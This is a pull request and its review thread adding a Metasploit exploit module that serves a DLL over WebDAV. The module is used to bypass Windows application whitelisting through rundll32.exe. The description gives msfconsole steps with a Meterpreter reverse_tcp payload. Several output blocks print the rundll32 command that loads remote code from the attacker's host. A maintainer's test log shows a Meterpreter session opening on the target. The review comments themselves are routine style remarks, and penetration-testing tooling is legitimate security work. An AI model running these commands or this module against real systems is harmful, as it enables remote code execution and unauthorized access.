### PR TITLE
Add webdav delivery module

### PR DESCRIPTION
**Pull request by jamesbcook**
This module simplifies the rundll32.exe Application Whitelisting Bypass technique.
The module creates a webdav server that hosts a dll file. When the user types the provided rundll32
command on a system, rundll32 will load the dll remotly and execute the provided export function.
The export function needs to be valid, but the default meterpreter function can be anything.
The process does write the dll to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
but does not load the dll from that location. This file should be removed after execution.
The extension can be anything you'd like, but you don't have to use one. Two files will be
written to disk. One named the requested name and one with a dll extension attached.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/webdav_delivery`
- [x] `set SRVHOST [IP]`
- [x] `set SRVPORT [PORT]`
- [x] `set PAYLOAD  windows/meterpreter/reverse_tcp`
- [x] `set LHOST [IP]`
- [x] `run`

## Expected Output

```
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 192.168.1.23:4444
[*] Using URL: https://192.168.1.23:443/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.23@8080\ANYTHING,Init
```

## SSL Verification

- [x] `set SRVPORT [443]`
- [x] `set SSL true`
- [x] `set SSLCert path/to/valid/cert/`
- [x] `run`

## Expected output

```
[*] Exploit running as background job 5.

[*] Started reverse TCP handler on 192.168.1.23:4444
[*] Using URL: https://192.168.1.23:443/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.23@ssl\ANYTHING,Init
```

## SSL port must be 443

- [x] `set SRVPORT [4443]`
- [x] `set SSL true`
- [x] `run`

## Expected output

```
[*] Exploit running as background job 4.

[*] Started reverse TCP handler on 192.168.1.23:4444
[*] Using URL: https://192.168.1.23:8080/
[*] Server started.
[*] Run the following command on the target machine:
[-] Exploit aborted due to failure: bad-config: SRVPORT must be 443
[*] Server stopped.
```

### CODE REVIEW

File: modules/exploits/windows/misc/webdav_delivery.rb [hunk 1]
```diff
@@ -0,0 +1,161 @@
...
+        The process does write the dll to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
+        but does not load the dll from that location. This file should be removed after execution.
+        The extension can be anything you'd like, but you don't have to use one. Two files will be
+        written to disk. One named the requested name and one with a dll extension attached.
+      ),
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Ryan Hanson <ryan.hanson@optiv.com>', # research  discovery (@ryhanson)
+          'James Cook <james.cook@optiv.com>',  # MSF Module (@_jbcook)
```
Comment (Green-m) [inline modules/exploits/windows/misc/webdav_delivery.rb]: No more comma after the last element in a array.
And the format of email should be like `James Cook <james.cook[at]optiv.com>`

File: modules/exploits/windows/misc/webdav_delivery.rb [hunk 2]
```diff
@@ -0,0 +1,161 @@
...
+        ],
+      'Targets'        => [['Automatic', {}]],
+      'Platform'       => %w(win),
+      'Arch' => [ARCH_X86, ARCH_X64],
```
Comment (Green-m) [inline modules/exploits/windows/misc/webdav_delivery.rb]: Please align `=>` to other lines.

File: modules/exploits/windows/misc/webdav_delivery.rb [hunk 3]
```diff
@@ -0,0 +1,161 @@
...
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'March 20 2017',
+      'References'     =>
+        [
+        ]))
+    register_options(
+      [
+        OptString.new('URIPATH', [true, 'The URI to use (do not change).', '/']),
```
Comment (Green-m) [inline modules/exploits/windows/misc/webdav_delivery.rb]: No more comma after the last element in a array.

File: modules/exploits/windows/misc/webdav_delivery.rb [hunk 4]
```diff
@@ -0,0 +1,161 @@
...
+      process_ignore(cli, _request)
+    end
+  end
+
+  def process_ignore(cli, _request)
+    vprint_status("#{_request.method} => 404 (#{_request.uri})")
+    resp = create_response(404, 'Not Found')
+    resp.body = ''
+    resp['Content-Type'] = 'text/html'
+    cli.send_response(resp)
```
Comment (Green-m) [inline modules/exploits/windows/misc/webdav_delivery.rb]: Consider `cli.send_not_found` ?

**Comment by space-r7** [comment]
Hi, @jamesbcook! Could you add some documentation for your module? 
Here's a template to get you started: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

File: modules/exploits/windows/misc/webdav_delivery.rb [hunk 5]
```diff
@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
```
Comment (space-r7) [inline modules/exploits/windows/misc/webdav_delivery.rb]: Change this to `https` instead.

**Comment by wchen-r7** [comment]
Works for me:

```
msf5 exploit(windows/misc/webdav_delivery) > rerun
[*] Reloading module...
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 172.16.249.1:4444 
msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\172.16.249.1@8080\ANYTHING,Init
[*] 172.16.249.130   webdav_delivery - PROPFIND /ANYTHING
[*] 172.16.249.130   webdav_delivery - Resp: <?xml version="1.0" encoding="utf-8" ?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/ANYTHING</D:href>
<D:propstat>
<D:prop>
<D:creationdate>2018-12-12T13:14:28Z</D:creationdate>
<D:displayname>ANYTHING</D:displayname>
<D:getcontentlanguage/>
<D:getcontentlength>5120</D:getcontentlength>
<D:getcontenttype/>
<D:getetag/>
<D:getlastmodified>Wed, 12 Dec 2018 13:14:28 GMT</D:getlastmodified>
<D:lockdiscovery/>
<D:resourcetype/>
<D:source/>
<D:supportedlock/>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
[*] 172.16.249.130   webdav_delivery - PROPFIND /ANYTHING
[*] 172.16.249.130   webdav_delivery - Resp: <?xml version="1.0" encoding="utf-8" ?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/ANYTHING</D:href>
<D:propstat>
<D:prop>
<D:creationdate>2018-12-12T13:14:31Z</D:creationdate>
<D:displayname>ANYTHING</D:displayname>
<D:getcontentlanguage/>
<D:getcontentlength>5120</D:getcontentlength>
<D:getcontenttype/>
<D:getetag/>
<D:getlastmodified>Wed, 12 Dec 2018 13:14:31 GMT</D:getlastmodified>
<D:lockdiscovery/>
<D:resourcetype/>
<D:source/>
<D:supportedlock/>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
[*] 172.16.249.130   webdav_delivery - PROPFIND /ANYTHING
[*] 172.16.249.130   webdav_delivery - Resp: <?xml version="1.0" encoding="utf-8" ?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/ANYTHING</D:href>
<D:propstat>
<D:prop>
<D:creationdate>2018-12-12T13:14:31Z</D:creationdate>
<D:displayname>ANYTHING</D:displayname>
<D:getcontentlanguage/>
<D:getcontentlength>5120</D:getcontentlength>
<D:getcontenttype/>
<D:getetag/>
<D:getlastmodified>Wed, 12 Dec 2018 13:14:31 GMT</D:getlastmodified>
<D:lockdiscovery/>
<D:resourcetype/>
<D:source/>
<D:supportedlock/>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
[*] 172.16.249.130   webdav_delivery - PROPFIND => 404 (/ANYTHING.manifest)
[*] 172.16.249.130   webdav_delivery - GET /ANYTHING
[*] 172.16.249.130   webdav_delivery - PROPFIND => 404 (/ANYTHING.123.Manifest)
[*] 172.16.249.130   webdav_delivery - PROPFIND => 404 (/ANYTHING.124.Manifest)
[*] 172.16.249.130   webdav_delivery - PROPFIND => 404 (/ANYTHING.2.Manifest)
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 3 opened (172.16.249.1:4444 -> 172.16.249.130:49213) at 2018-12-12 13:14:41 -0600
```

Had to update `send_not_found` a little. The `cli` argument is a socket object from Rex, so it's not using the `send_not_found` from the `HttpServer` mixin, had to add that function in the module.

**Comment by wchen-r7** [comment]
# Release Notes

This module simplifies the rundll32.exe Application Whitelisting Bypass technique. It creates a webdav server that hosts a dll file. When the user types the provided rundll32
command on a system, rundll32 will load the dll remotly and execute the provided export function.

**Pull request merged**